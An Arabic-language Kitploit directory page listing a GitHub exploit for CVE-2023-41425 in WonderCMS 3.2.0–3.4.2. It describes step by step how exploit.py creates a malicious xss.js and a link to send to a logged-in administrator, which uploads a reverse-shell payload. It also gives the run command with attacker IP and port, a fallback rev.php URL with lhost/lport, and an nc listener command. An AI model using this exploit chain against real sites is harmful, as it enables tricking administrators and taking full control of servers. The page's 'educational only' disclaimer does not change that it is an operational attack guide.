Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — حقن Xss، WonderCMS 3.2.0 -3.4.2 | Kitploit
أدوات/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
أدوات التصيدتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-41425-WonderCMS-Authenticated-RCE

حقن Xss، WonderCMS 3.2.0 -3.4.2

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2023-41425-WonderCMS-Authenticated-RCE

الوصف

WonderCMS الإصدارات من 3.2.0 إلى 3.4.2 تحتوي على ثغرة. يمكن للمهاجمين عن بُعد السيطرة الكاملة على الخادم باستخدام استغلال Cross-Site Scripting (XSS) (لأغراض تعليمية فقط). إليك خطة العمل:

كيف تعمل:

يستغل الاستغلال مكوّن installModule في WonderCMS لإدخال سكربت مُعدّ بدقة ينفّذ أكوادًا عشوائية.

الإعداد

  • الأداة: exploit.py
  • ما ستحتاجه:
    • رابط الهدف حيث تم تثبيت WonderCMS (لا يتطلب كلمة مرور المشرف).
    • عنوان IP لجهاز المهاجم.
    • منفذ لمستمع الـ reverse shell.

التنفيذ خطوة بخطوة

  1. يقوم السكربت بإنشاء ملف باسم xss.js. هذا السلاح البرمجي بلغة JavaScript مصمم لاستغلال XSS المنعكسة.
  2. يُنتج رابطًا خبيثًا. سترسل هذا الرابط إلى المشرف.
  3. يحدث السحر عندما يفتح المشرف (مستخدم مسجّل الدخول) رابطك أو ينقر عليه:
  • تُرسل طلبات في الخلفية دون موافقته.
  • يتم رفع حمولة الـ reverse shell باستخدام ميزة رفع القالب/الإضافة.
  1. بمجرد الرفع، يتم تنفيذ الحمولة وتمنحك اتصال reverse shell مباشرًا بالخادم الهدف.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

مثال

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

خطة احتياطية:

إذا لم يتم تفعيل الـ reverse shell تلقائيًا، انتقل مباشرة إلى:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

ملاحظة:

تذكّر تشغيل مستمع باستخدام الأمر التالي:

root@kitploit:~
nc -lvp 4444

الفضل

prodigiousMind لاكتشافه والإبلاغ عن الثغرة https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

تنزيل الأداة